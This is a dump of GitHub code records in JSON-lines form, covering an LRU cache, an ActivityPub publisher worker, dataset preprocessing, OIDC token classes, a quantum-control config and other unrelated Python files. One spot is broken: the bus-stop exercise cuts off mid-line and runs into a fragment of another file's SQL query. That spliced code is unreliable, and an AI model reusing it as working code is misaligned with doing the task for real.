node.value\n \n def put(self, key: int, value: int) -> None:\n \n node = DLinkedNode(key, value)\n \n # 如果key不在cache中\n if key not in self.cache:\n # 且此时缓存容量已满\n if self.capacity == self.size:\n # 移除链表中最后一个节点\n last_node = self.remove_last()\n # 同时从cache中弹出最后一个节点\n self.cache.pop(last_node.key)\n # 把新节点加入到链表的头部\n self.add_to_head(node)\n # 更新cache\n self.cache[key] = node\n else:\n # 容量未满, 直接把新节点加入到链表头部 \n self.add_to_head(node)\n # 同时更新缓存\n self.cache[key] = node\n # 缓存大小加一\n self.size += 1\n else:\n # 如果key在cache中, 那就不用再考虑缓存容量的影响\n # 把老节点cache和链表中移除\n old_node = self.cache.pop(key)\n self.remove_node(old_node)\n # 再把新节点加入到cache和链表中\n self.add_to_head(node)\n self.cache[key] = node\n \n def add_to_head(self, node: DLinkedNode):\n \"\"\"\n 把节点加入到链表头部\n \"\"\"\n next_node = self.head.next\n \n self.head.next = node\n node.prev = self.head\n \n node.next = next_node\n next_node.prev = node\n \n def remove_node(self, node: DLinkedNode):\n \"\"\"\n 从链表中移除指定节点\n \"\"\"\n node.prev.next = node.next\n node.next.prev = node.prev\n \n def move_to_head(self, node: DLinkedNode):\n \"\"\"\n 把节点移动到链表头部\n \"\"\"\n self.remove_node(node)\n self.add_to_head(node)\n \n def remove_last(self) -> DLinkedNode:\n \"\"\"\n 移除链表中最后一个节点并返回\n \"\"\"\n last_node = self.tail.prev\n \n self.tail.prev.prev.next = self.tail\n self.tail.prev = self.tail.prev.prev\n return last_node\n ","repo_name":"KuiyuanZhang/Leetcode-Train","sub_path":"Python_Struct/LRU.py","file_name":"LRU.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24337262326","text":"import aiohttp\nimport asyncio\nimport base64\nimport hashlib\nimport logging\nimport time\nimport urllib.parse\n\n\nfrom ..http_signatures import HTTPSignatureSigner\nfrom ..activity_streams import AS2Object, AS2Activity, AS2Pointer, AS2_PUBLIC\nfrom ..activity_streams.collection import AS2Collection\nfrom ..activity_pub.actor import Actor\n\n\nAS2_RECIPIENT = 1\nAP_INBOX = 2\nLOCAL_DELIVERY = 3\n\n\nclass PublisherRequest:\n def __init__(self, publisher, activity: AS2Activity, recipient: str, kind=AS2_RECIPIENT):\n self.publisher = publisher\n self.activity = activity\n self.recipient = recipient\n self.kind = kind\n self.error_count = 0\n self.complete = False\n self.originator = AS2Pointer(self.activity.actor).dereference()\n\n async def handle_local_delivery(self):\n obj = AS2Collection.fetch_local(self.recipient, use_pointers=True)\n\n if isinstance(obj, AS2Collection) and not obj.contains_uri(self.activity.id):\n obj.prepend(self.activity)\n obj.commit()\n\n asyncio.ensure_future(self.publisher.notify_listeners(obj.id, self.activity))\n\n return self.completed()\n\n def handle_public(self):\n if self.activity.__ephemeral__:\n return self.completed()\n\n self.publisher.add_activity(self.activity, self.publisher.app.shared_inbox_uri, LOCAL_DELIVERY)\n return self.completed()\n\n def handle_actor(self, actor: Actor):\n if actor.local() and not self.activity.__ephemeral__:\n self.publisher.add_activity(self.activity, actor.inbox, LOCAL_DELIVERY)\n return self.completed()\n\n if self.originator.local() or actor.local():\n self.publisher.add_activity(self.activity, actor.inbox, AP_INBOX)\n\n return self.completed()\n\n def handle_collection(self, obj: AS2Collection):\n if not self.activity.__ephemeral__:\n local = [self.publisher.add_activity(self.activity, actor.inbox, LOCAL_DELIVERY)\n for actor in obj.__items__ if isinstance(actor, Actor) and actor.local()]\n\n inboxes = set([actor.best_inbox() for actor in obj.__items__ if isinstance(actor, Actor) and actor.remote()])\n logging.info('PUBLISHER: Expanded collection %r to %r.', obj.id, inboxes)\n [self.publisher.add_activity(self.activity, inbox, AP_INBOX) for inbox in inboxes]\n return self.completed()\n\n async def handle_as2_recipient(self):\n if self.recipient == AS2_PUBLIC:\n return self.handle_public()\n\n obj = await AS2Object.fetch_from_uri(self.recipient)\n if isinstance(obj, AS2Collection):\n return self.handle_collection(obj)\n elif isinstance(obj, Actor):\n return self.handle_actor(obj)\n\n return self.fatality()\n\n async def handle_ap_inbox(self):\n # We can't deliver on behalf of remote users.\n if not self.originator.local():\n logging.info('PUBLISHER: WTF: Trying to deliver messages on behalf of remote user %s.', self.originator.id)\n return self.completed()\n\n user = self.originator.user()\n\n payload = self.activity.serialize()\n uri = urllib.parse.urlsplit(self.recipient)\n digest = base64.b64encode(hashlib.sha256(payload.encode('utf-8')).digest()).decode('utf-8')\n\n headers = {\n '(request-target)': 'post %s' % uri.path,\n 'Content-Length': str(len(payload)),\n 'Content-Type': 'application/activity+json',\n 'User-Agent': self.publisher.app.user_agent,\n 'Host': uri.netloc,\n 'Digest': 'SHA-256=' + digest,\n 'Date': time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime()),\n }\n\n privkey = user.privkey()\n\n signed_headers = self.publisher.signer.sign(headers, privkey, self.originator.publicKey['id'])\n\n try:\n async with aiohttp.ClientSession() as session:\n async with session.post(self.recipient, data=payload, headers=signed_headers) as resp:\n if resp.status == 202:\n return self.completed()\n elif resp.status >= 500:\n return self.error()\n\n resp_payload = await resp.text()\n logging.debug('%r >> %r', self.recipient, resp_payload)\n return self.completed()\n except Exception as e:\n logging.info('Exception %r when pushing to %s.', e, self.recipient)\n return self.error()\n\n async def publish(self):\n if not self.originator:\n logging.info('WTF: Publish request without originator. %r', self.activity.serialize())\n return self.fatality()\n\n logging.info('Publishing %s to %s (type %d).', self.activity.id, self.recipient, self.kind)\n\n if self.kind == AS2_RECIPIENT:\n return (await self.handle_as2_recipient())\n elif self.kind == AP_INBOX:\n return (await self.handle_ap_inbox())\n elif self.kind == LOCAL_DELIVERY:\n return (await self.handle_local_delivery())\n\n logging.error('Not sure how to handle publish request type %d.', self.kind)\n return self.fatality()\n\n def completed(self):\n self.complete = True\n return self\n\n def fatality(self):\n self.error_count = 9999999\n return self\n\n def error(self):\n self.error_count += 1\n return self\n\n def maybe_cull(self):\n if self.error_count > 3:\n logging.info('Culling publish request for activity %s to %s due to excessive errors (%d).',\n self.activity.id, self.recipient, self.error_count)\n return True\n\n return self.complete\n\n\nclass PublisherWorker:\n def __init__(self, app):\n self.app = app\n self.queue = []\n self.event = asyncio.Event()\n self.signer = HTTPSignatureSigner()\n self.listeners = {}\n\n asyncio.ensure_future(self.work_loop())\n asyncio.ensure_future(self.wakeup_loop())\n\n def add_activity(self, activity: AS2Activity, recipient: str, kind=AS2_RECIPIENT) -> PublisherRequest:\n logging.debug('Enqueueing activity %s for publishing to recipient %r (kind %d).', activity.id, recipient, kind)\n\n pr = PublisherRequest(self, activity, recipient, kind)\n self.queue += [pr]\n self.event.set()\n return pr\n\n def cull_queue(self):\n self.queue = [pr for pr in self.queue if not pr.maybe_cull()]\n\n async def process_requests(self):\n logging.debug('Publisher work queue has %d items.', len(self.queue))\n\n if len(self.queue) == 0:\n return\n\n await asyncio.wait([pr.publish() for pr in self.queue])\n\n async def work_loop(self):\n logging.info('Starting publisher worker.')\n\n while True:\n self.event.clear()\n await self.process_requests()\n self.cull_queue()\n await self.event.wait()\n\n async def wakeup_loop(self):\n sleep_time = 10\n\n logging.info('Publisher worker will sleep for a maximum of %d seconds.', sleep_time)\n\n while True:\n await asyncio.sleep(sleep_time)\n self.event.set()\n\n def listeners_for_uri(self, uri: str) -> list:\n return self.listeners.get(uri, [])\n\n def attach_uri_listener(self, uri: str, listener):\n listeners = self.listeners_for_uri(uri)\n self.listeners[uri] = listeners + [listener]\n\n async def notify_listeners(self, uri: str, activity):\n tasks = [listener(uri, activity) for listener in self.listeners_for_uri(uri)]\n if tasks:\n await asyncio.wait(tasks, timeout=5)\n","repo_name":"kaniini/jejune","sub_path":"jejune/workers/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"5"} +{"seq_id":"34400748693","text":"from CMeEE_trans import *\nfrom CMeEE_reshape import *\nimport CMeEE_stats\nimport CMeEE_wash\nimport os\n\nos.makedirs('./o/reshape', exist_ok=True)\nos.makedirs('./o/stats', exist_ok=True)\nos.makedirs('./o/wash', exist_ok=True)\nos.makedirs('./o/trans', exist_ok=True)\n\nif __name__ == '__main__':\n tasks = {\n '1': '离线训练:将在线train-dev重新分配为离线train-dev-test',\n '2': '预测:将在线test.json转为test.CMeEE.bmes',\n '3': '在线提交:将预测test.CMeEE.out.bmes转为test.CMeEE.out.json'\n }\n\n task = 1\n\n if task == 1:\n print('【合并】 train集与dev集 并写入文件...')\n json_data_all = merge('i/CMeEE_train.json', 'i/CMeEE_dev.json')\n jd2jf(json_data_all, 'o/reshape/CMeEE_all.json')\n print('Done.')\n\n print('【清洗】 合并后的数据 并写入文件...')\n json_data_all_washed = CMeEE_wash.main(json_data_all)\n jd2jf(json_data_all_washed, 'o/wash/CMeEE_all_washed.json')\n print('Done.')\n\n print('【统计】 清洗后的数据 并写入文件...')\n CMeEE_stats.main(\n json_data_all_washed,\n '清洗后(不洗长句子)',\n 'o/stats/CMeEE_all_washed_sentence.csv',\n 'o/stats/CMeEE_all_washed_entities.csv',\n 'o/stats/CMeEE_sum.csv')\n print('Done.')\n\n print('【划分并转化】 清洗后的数据 并写入文件...')\n json_train, json_dev, json_test = split(json_data_all, 7, 2, 1)\n jd2bf(json_train, 'o/trans/train.char.bmes')\n jd2bf(json_dev, 'o/trans/dev.char.bmes')\n jd2bf(json_test, 'o/trans/test.char.bmes')\n print('Done.')\n\n elif task == 2:\n jf2bf('i/CMeEE_test.json', 'o/trans/test.CMeEE.bmes')\n json_test = bf2jd('o/trans/test.CMeEE.bmes')\n CMeEE_stats.main(\n json_test,\n 'test.bmes 预测前',\n 'o/stats/test_1_sentence.csv',\n 'o/stats/test_1_entities.csv',\n 'o/stats/test_sum.csv')\n\n elif task == 3:\n json_output = bf2jd('o/CMeEE_out.bmes')\n jd2jf(json_output, 'o/CMeEE-test.json')\n CMeEE_stats.main(\n json_output,\n 'test.bmes 预测后',\n 'o/stats/test_2_sentence.csv',\n 'o/stats/test_2_entities.csv',\n 'o/stats/test_sum.csv')\n","repo_name":"Esirn/CMeEE_preprocess","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1069599102","text":"import glob\nimport cv2\nimport os\n\nimage_list = []\nimage_names = []\n\nk = 413\nfor filename in glob.glob('C:/Users/Deeathex/PycharmProjects/TestSignLang1/SavedImages/*.JPG'):\n original_image = cv2.imread(filename)\n image_list.append(original_image)\n image_name = filename.split(\"\\\\\")\n new_name = image_name[0]+\"/\" + str(k) + \".JPG\"\n print(new_name)\n k += 1\n image_names.append(new_name)\n # os.remove(filename)\n\ni = 0\nfor original_image in image_list:\n cv2.imwrite(image_names[i], original_image)\n i = i + 1\n","repo_name":"Deeathex/SignLanguageRecognition","sub_path":"renameImages.py","file_name":"renameImages.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26207947595","text":"from typing import Optional\nfrom uuid import uuid1\n\nfrom oidcmsg.impexp import ImpExp\nfrom oidcmsg.time_util import utc_time_sans_frac\n\n\nclass MintingNotAllowed(Exception):\n pass\n\n\nclass Item(ImpExp):\n parameter = {\n \"expires_at\": 0,\n \"issued_at\": 0,\n \"not_before\": 0,\n \"revoked\": bool,\n \"usage_rules\": {},\n \"used\": 0,\n }\n\n def __init__(\n self,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n ):\n ImpExp.__init__(self)\n self.issued_at = issued_at or utc_time_sans_frac()\n self.not_before = not_before\n if expires_at == 0 and expires_in != 0:\n self.set_expires_at(expires_in)\n else:\n self.expires_at = expires_at\n\n self.revoked = revoked\n self.used = used\n self.usage_rules = usage_rules or {}\n\n def set_expires_at(self, expires_in):\n self.expires_at = utc_time_sans_frac() + expires_in\n\n def max_usage_reached(self):\n if \"max_usage\" in self.usage_rules:\n return self.used >= self.usage_rules[\"max_usage\"]\n else:\n return False\n\n def is_active(self, now=0):\n if self.max_usage_reached():\n return False\n\n if self.revoked:\n return False\n\n if now == 0:\n now = utc_time_sans_frac()\n\n if self.not_before:\n if now < self.not_before:\n return False\n\n if self.expires_at:\n if now > self.expires_at:\n return False\n\n return True\n\n def revoke(self):\n self.revoked = True\n\n\nclass SessionToken(Item):\n parameter = Item.parameter.copy()\n parameter.update(\n {\n \"based_on\": \"\",\n \"claims\": {},\n \"id\": \"\",\n \"name\": \"\",\n \"resources\": [],\n \"scope\": [],\n \"token_class\": \"\",\n \"usage_rules\": {},\n \"used\": 0,\n \"value\": \"\",\n }\n )\n\n def __init__(\n self,\n token_class: str = \"\",\n value: str = \"\",\n based_on: Optional[str] = None,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n id: str = \"\",\n scope: Optional[list] = None,\n claims: Optional[dict] = None,\n resources: Optional[list] = None,\n ):\n Item.__init__(\n self,\n usage_rules=usage_rules,\n issued_at=issued_at,\n expires_in=expires_in,\n expires_at=expires_at,\n not_before=not_before,\n revoked=revoked,\n used=used,\n )\n\n self.token_class = token_class\n self.value = value\n self.based_on = based_on\n self.id = id or uuid1().hex\n self.set_defaults()\n self.scope = scope or []\n self.claims = claims or {} # default is to not release any user information\n self.resources = resources or []\n self.name = self.__class__.__name__\n\n def set_defaults(self):\n pass\n\n def register_usage(self):\n self.used += 1\n\n def has_been_used(self):\n return self.used != 0\n\n def supports_minting(self, token_class):\n _supports_minting = self.usage_rules.get(\"supports_minting\")\n if _supports_minting is None:\n return False\n else:\n return token_class in _supports_minting\n\n\nclass AccessToken(SessionToken):\n parameter = SessionToken.parameter.copy()\n parameter.update({\"token_type\": \"\"})\n\n def __init__(\n self,\n token_class: str = \"\",\n value: str = \"\",\n based_on: Optional[str] = None,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n id: str = \"\",\n scope: Optional[list] = None,\n claims: Optional[dict] = None,\n resources: Optional[list] = None,\n token_type: Optional[str] = \"bearer\",\n ):\n SessionToken.__init__(\n self,\n token_class=token_class,\n value=value,\n based_on=based_on,\n usage_rules=usage_rules,\n issued_at=issued_at,\n expires_in=expires_in,\n expires_at=expires_at,\n not_before=not_before,\n revoked=revoked,\n used=used,\n id=id,\n scope=scope,\n claims=claims,\n resources=resources,\n )\n\n self.token_type = token_type\n\n\nclass AuthorizationCode(SessionToken):\n def set_defaults(self):\n if \"supports_minting\" not in self.usage_rules:\n self.usage_rules[\"supports_minting\"] = [\n \"access_token\",\n \"refresh_token\",\n \"id_token\",\n ]\n\n self.usage_rules[\"max_usage\"] = 1\n\n\nclass RefreshToken(SessionToken):\n def set_defaults(self):\n if \"supports_minting\" not in self.usage_rules:\n self.usage_rules[\"supports_minting\"] = [\"access_token\", \"refresh_token\"]\n\n\nclass IDToken(SessionToken):\n parameter = SessionToken.parameter.copy()\n parameter.update({\"session_id\": \"\"})\n\n def __init__(\n self,\n token_class: str = \"\",\n value: str = \"\",\n based_on: Optional[str] = None,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n id: str = \"\",\n session_id: str = \"\",\n scope: Optional[list] = None,\n claims: Optional[dict] = None,\n resources: Optional[list] = None,\n token_type: Optional[str] = \"bearer\",\n ):\n SessionToken.__init__(\n self,\n token_class=token_class,\n value=value,\n based_on=based_on,\n usage_rules=usage_rules,\n issued_at=issued_at,\n expires_in=expires_in,\n expires_at=expires_at,\n not_before=not_before,\n revoked=revoked,\n used=used,\n id=id,\n scope=scope,\n claims=claims,\n resources=resources,\n )\n\n self.session_id = session_id\n\n\nSHORT_TYPE_NAME = {\"authorization_code\": \"A\", \"access_token\": \"T\", \"refresh_token\": \"R\"}\n","repo_name":"IdentityPython/oidc-op","sub_path":"src/oidcop/session/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"5"} +{"seq_id":"73017305113","text":"# List1-7th-bus stop problem\ntry:\n T = int(input('Type test case number (T)'))\nexcept ValueError:\n print('Type positive integer')\nif T < 1:\n raise ValueError('T should be a positive integer')\nfor test_case in range(1, T + 1):\n print('Type three positive integers sepearated by white space: K N M \\\n \\nK: charging capacity - number of bus stops without charging,\\\n \\nN: Total number of bus stops, \\\n \\nM: Number of charging stations')\n try:\n K, N, M = map(int, input().split())\n except ValueError:\n print('ValueError: Type integers separated by whitespace')\n if not all(1 <= set_val <= 100 for set_val in [K, N, M]):\n raise ValueError('All input should be between 1 and 100')\n if M > N:\n raise ValueError('M <= N')\n try:\n charging_stop = list(map(int, input('Type charging station bus stop \\\n numbers seperated by whitespace').split()))\n except ValueError:\n print('ValueError: Type integers separated by whitespace')\n if len(charging_stop) != M:\n raise ValueError(f'Input array size should be {M}')\n current_stop = 0\n charging_number = 0\n next_charging_idx = 0\n while current_stop < N:\n # If cur+K => N then we don't need to charge, so end\n if ((current_stop + K) >= N):\n print(f\"#{test_case} {charging_number}\")\n break\n else:\n # If there is no available next charging stop\n # (next charging stop index= M, if we increment it by 1)\n if next_charging_idx >= (M):\n # Fail to arrive terminal stop\n print(f\"#{test_case} 0\")\n break\n else:\n # there is available charing stop.\n if current_stop + K < charging_stop[next_charging_idx]:\n # it cannot arrive so fail.\n print(f\"#{test_case} 0\")\n break\n else:\n # Now I need to find 'minimum number'\n # so find the maximum charging stop number satisfying\n # \"current_Stop_number+K >= nextcharging stop number\"\n charging_number = charging_number+1\n while current_stop + K >= charging_stop[next_charging_idx]:\n if next_charging_idx == M-1:\n # this is when first trial was the last stop\n next_charging_idx = next_charging_idx + 1\n break\n else:\n # next_charging_stop_index(SELECT lasttrainedat from lasttrained)\"\n rows = self.get(query)\n return rows\n","repo_name":"lakshmanmallidi/AttendaceTrackingWithFaceRecognition","sub_path":"DbOperations.py","file_name":"DbOperations.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"71945417432","text":"import numpy as np\n#router ip 192.168.15.128\n\nreadout_length = 1000\n\nQ1_readout_frequency = 156.03e6\nQ2_readout_frequency = 129.6373e6\n\n\n\nconfig = {\n\n \"version\": 1,\n\n \"controllers\": {\n \"con1\": {\n\n \"analog_outputs\": {\n 1: {\"offset\": 0.0}, # Readout\n 2: {\"offset\": 0.0}, # Q1_R\n 3: {\"offset\": 0.0}, # Q1_L\n 4: {\"offset\": 0.0}, # Q2_R\n 5: {\"offset\": 0.0}, # Q2_L\n },\n\n \"digital_outputs\": {\n 1: {},\n },\n\n \"analog_inputs\": {\n 1: {\"offset\": 0.21164},\n 2: {\"offset\": 0.0},\n },\n\n }\n },\n\n \"elements\": {\n\n \"Q1_R\": {\n \"singleInput\": {\n \"port\": (\"con1\", 2)\n },\n 'intermediate_frequency': 0e6,\n 'hold_offset': {'duration':200}, #hold offset to make the element \"sticky\", the duration sets the ramp to zero duration see :https://qm-docs.qualang.io/qm_config.html#null%2Fpaths%2F~1%2Fget\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q1_L\": {\n \"singleInput\": {\n \"port\": (\"con1\", 3)\n },\n 'intermediate_frequency': 0e6,\n 'hold_offset': {'duration':200}, #see above\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q2_R\": {\n \"singleInput\": {\n \"port\": (\"con1\", 4)\n },\n 'intermediate_frequency': 0e6,\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q2_L\": {\n \"singleInput\": {\n \"port\": (\"con1\", 5)\n },\n 'intermediate_frequency': 0e6,\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q1_readout\": {\n \"singleInput\": {\n \"port\": (\"con1\", 1)\n },\n \"intermediate_frequency\": Q1_readout_frequency,\n \"operations\": {\n \"readout_pulse_0_2\": \"readout_pulse_0_2\",\n \"readout_pulse_0_1\": \"readout_pulse_0_1\",\n \"readout_pulse_0_05\": \"readout_pulse_0_05\",\n \"readout_pulse_0_01\": \"readout_pulse_0_01\",\n \"readout_pulse_0_0001\": \"readout_pulse_0_0001\",\n },\n \"outputs\": {\"out1\": (\"con1\", 1)},\n \"time_of_flight\": 180+190-2,\n \"smearing\": 0,\n },\n\n \"Q2_readout\": {\n \"singleInput\": {\n \"port\": (\"con1\", 1)\n },\n \"intermediate_frequency\": Q2_readout_frequency,\n \"operations\": {\n \"readout_pulse_0_05\": \"readout_pulse_0_05\",\n },\n \"outputs\": {\"out1\": (\"con1\", 1)},\n \"time_of_flight\": 180,\n \"smearing\": 0,\n },\n\n },\n\n \"pulses\": {\n\n \"CW\": {\n \"operation\": \"control\",\n \"length\": 100,\n \"waveforms\": {\"single\": \"const_wf\"},\n },\n\n \"readout_pulse_0_2\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_2\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_1\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_1\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_05\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_05\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_01\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_01\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_001\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_001\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_0001\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_0001\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n\n\n\n },\n\n \"waveforms\": {\n\n \"const_wf\": {\"type\": \"constant\", \"sample\": 0.05*7.063},\n\n \"zero_wf\": {\"type\": \"constant\", \"sample\": 0.0},\n\n \"readout_wf_0_2\": {\"type\": \"constant\", \"sample\": 0.2},\n\n \"readout_wf_0_1\": {\"type\": \"constant\", \"sample\": 0.1},\n\n \"readout_wf_0_05\": {\"type\": \"constant\", \"sample\": 0.05},\n\n \"readout_wf_0_01\": {\"type\": \"constant\", \"sample\": 0.01},\n\n \"readout_wf_0_001\": {\"type\": \"constant\", \"sample\": 0.001},\n\n \"readout_wf_0_0001\": {\"type\": \"constant\", \"sample\": 0.0001},\n\n },\n\n \"digital_waveforms\": {\n \"ON\": {\"samples\": [(1, 0)]}\n },\n\n \"integration_weights\": {\n\n \"cos\": {\n \"cosine\": [(1.0, readout_length)],\n \"sine\": [(0.0, readout_length)],\n },\n\n \"sin\": {\n \"cosine\": [(0.0, readout_length)],\n \"sine\": [(1.0, readout_length)],\n },\n\n },\n\n}","repo_name":"qdev-dk/QMachine","sub_path":"docs/example_notebooks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7308327807","text":"from fpdf import FPDF\nimport pandas as pd\n\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\npdf.set_auto_page_break(auto=False, margin=0)\n\ndf = pd.read_csv(\"topics.csv\")\n\nfor index, row in df.iterrows():\n pdf.add_page()\n\n # Set the header\n pdf.set_font(family=\"Times\", style=\"B\", size=24)\n pdf.set_text_color(100, 100, 100)\n # RGB colours. You can assign it from 0-254.\n pdf.cell(w=0, h=12, txt=row[\"Topic\"], align=\"L\", ln=1)\n # Cell's width, height(recommended font size), align left side, ln = break line\n for y in range(30, 298, 10):\n pdf.line(10, y, 200, y)\n # x1, y1, x2, y2 co-ordinates in mm, coz you assigned it in mm.\n\n # Set the footer\n pdf.ln(267)\n pdf.set_font(family=\"Times\", style=\"I\", size=8)\n pdf.set_text_color(180, 180, 180)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\n for i in range(row[\"Pages\"] - 1):\n pdf.add_page()\n # range represents a list. Suppose range(3) represents [0, 1, 2] means i -> 0, 1, 2.\n # Why -1 means coz already 1 page is created in parent for loop.\n for y in range(20, 298, 10):\n pdf.line(10, y, 200, y)\n\n # Set the footer\n pdf.ln(279)\n # 267 + 12(Cell height) = 279\n pdf.set_font(family=\"Times\", style=\"I\", size=8)\n pdf.set_text_color(180, 180, 180)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\npdf.output(\"output.pdf\")\n","repo_name":"Gowtham-sr/pdf-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72833611353","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Actor(nn.Module):\n def __init__(self, n_states, n_actions):\n super().__init__()\n self.n_states = n_states\n self.n_actions = n_actions\n\n self.fc1 = nn.Linear(in_features=self.n_states, out_features=64)\n self.fc2 = nn.Linear(in_features=64, out_features=64)\n self.fc_linear = nn.Linear(in_features=64, out_features=1)\n self.fc_angular = nn.Linear(in_features=64, out_features=1)\n\n # self.log_std = nn.Parameter(torch.full((self.n_actions,),-2.5))\n self.log_std = nn.Parameter(torch.tensor([-4.0, -2.5]))\n def forward(self, x):\n\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n \n mean_linear = F.tanh(F.relu(self.fc_linear(x)))\n mean_angular = F.tanh(self.fc_angular(x))\n \n mean = torch.cat([mean_linear, mean_angular], dim=-1) \n \n std = self.log_std.exp().expand_as(mean)\n \n return mean, std\n\n\n\nclass Critic(nn.Module):\n def __init__(self, n_states):\n super().__init__()\n self.n_states = n_states\n self.fc1 = nn.Linear(in_features=self.n_states, out_features=64)\n self.fc2 = nn.Linear(in_features=64, out_features=64)\n self.fc3 = nn.Linear(in_features=64, out_features=1)\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n \n","repo_name":"Suptree/phers_framework","sub_path":"src/non_obstacle_stage_parallel/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36723082375","text":"import os\nimport sys\nimport pkgutil\nfrom collections import OrderedDict\n\npkg_dir = os.path.dirname(__file__)\nfor (module_loader, name, ispkg) in pkgutil.iter_modules([pkg_dir]):\n pkgutil.importlib.import_module('.' + name, __package__)\n\n# -----------------------------------------------------------------------------\n# Module interface\n# -----------------------------------------------------------------------------\n\n# Usage:\n#\n# from pal.filters import filters\n# registers = filters[\"filter_name\"].filter_exclusive(registers)\n# registers = filters[\"filter_name\"].filter_inclusive(registers)\n\nfilters = OrderedDict()\nfilters[\"aarch32\"] = aarch32.AArch32RegisterFilter()\nfilters[\"aarch64\"] = aarch64.AArch64RegisterFilter()\nfilters[\"activity_monitor\"] = activity_monitor.ActivityMonitorRegisterFilter()\nfilters[\"deprecated\"] = deprecated.DeprecatedRegisterFilter()\nfilters[\"external\"] = external.ExternalRegisterFilter()\nfilters[\"gic\"] = gic.GICRegisterFilter()\nfilters[\"irregular_size\"] = irregular_size.IrregularSizeFilter()\nfilters[\"loregion\"] = loregion.LORegionRegisterFilter()\nfilters[\"misc\"] = misc.MiscelaneousRegisterFilter()\nfilters[\"mpam\"] = mpam.MPAMRegisterFilter()\nfilters[\"no_access_mechanism\"] = no_access_mechanism.NoAccessMechanismFilter()\nfilters[\"scxtnum\"] = scxtnum.SCXTNUMRegisterFilter()\nfilters[\"statistical_profiling\"] = \\\n statistical_profiling.StatisticalProfilingRegisterFilter()\nfilters[\"sve\"] = sve.SVERegisterFilter()\nfilters[\"trace\"] = trace.TraceRegisterFilter()\nfilters[\"invalid\"] = invalid.InvalidRegisterFilter()\n","repo_name":"Bareflank/pal","sub_path":"pal/filter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"5"} +{"seq_id":"31594505913","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom django.utils.translation import gettext_lazy as _\nfrom user import managers\n\n# Create your models here.\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \"\"\"Model definition for User.\"\"\"\n\n first_name = models.CharField(max_length=250, null=True)\n middle_name = models.CharField(max_length=250, null=True, blank=True)\n last_name = 